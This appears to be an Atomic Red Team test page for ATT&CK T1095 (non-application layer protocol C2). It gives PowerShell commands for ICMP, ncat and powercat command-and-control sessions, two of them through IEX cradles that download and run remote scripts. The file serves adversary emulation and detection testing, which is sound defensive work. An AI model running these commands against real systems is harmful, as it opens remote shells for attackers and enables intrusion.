Skip to content

Latest commit

 

History

History
134 lines (77 loc) · 4.23 KB

T1095.md

File metadata and controls

134 lines (77 loc) · 4.23 KB
Raw

T1095 - Non-Application Layer Protocol

Description from ATT&CK

Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.(Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).

ICMP communication between hosts is one example.(Citation: Cisco Synful Knock Evolution) Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts; (Citation: Microsoft ICMP) however, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.

Atomic Tests


Atomic Test #1 - ICMP C2

This will attempt to start C2 Session Using ICMP. For information on how to set up the listener refer to the following blog: https://www.blackhillsinfosec.com/how-to-c2-over-icmp/

Supported Platforms: Windows

Inputs:

Name Description Type Default Value
server_ip The IP address of the listening server string 127.0.0.1

Attack Commands: Run with powershell!

IEX (New-Object System.Net.WebClient).Downloadstring('https://raw.githubusercontent.com/samratashok/nishang/c75da7f91fcc356f846e09eab0cfd7f296ebf746/Shells/Invoke-PowerShellIcmp.ps1')
Invoke-PowerShellIcmp -IPAddress #{server_ip}


Atomic Test #2 - Netcat C2

Start C2 Session Using Ncat To start the listener on a Linux device, type the following: nc -l -p

Supported Platforms: Windows

Inputs:

Name Description Type Default Value
server_port The port for the C2 connection integer 80
ncat_exe The location of ncat.exe path $env:TEMP\T1095\nmap-7.80\ncat.exe
ncat_path The folder path of ncat.exe path $env:TEMP\T1095
server_ip The IP address or domain name of the listening server string 127.0.0.1

Attack Commands: Run with powershell!

cmd /c #{ncat_exe} #{server_ip} #{server_port}

Dependencies: Run with powershell!

Description: ncat.exe must be available at specified location (#{ncat_exe})
Check Prereq Commands:
if( Test-Path "#{ncat_exe}") {exit 0} else {exit 1}
Get Prereq Commands:
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -ItemType Directory -Force -Path #{ncat_path} | Out-Null
$parentpath = Split-Path (Split-Path "#{ncat_exe}"); $zippath = "$parentpath\nmap.zip"
Invoke-WebRequest  "https://nmap.org/dist/nmap-7.80-win32.zip" -OutFile "$zippath"
  Expand-Archive $zippath $parentpath -Force
  $unzipPath = Join-Path $parentPath "nmap-7.80"
if( $null -eq (Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | ?{$_.DisplayName -like "Microsoft Visual C++*"}) ) {
  Start-Process (Join-Path $unzipPath "vcredist_x86.exe")
}


Atomic Test #3 - Powercat C2

Start C2 Session Using Powercat To start the listener on a Linux device, type the following: nc -l -p

Supported Platforms: Windows

Inputs:

Name Description Type Default Value
server_ip The IP address or domain name of the listening server string 127.0.0.1
server_port The port for the C2 connection integer 80

Attack Commands: Run with powershell!

IEX (New-Object System.Net.Webclient).Downloadstring('https://raw.githubusercontent.com/besimorhino/powercat/ff755efeb2abc3f02fa0640cd01b87c4a59d6bb5/powercat.ps1')
powercat -c #{server_ip} -p #{server_port}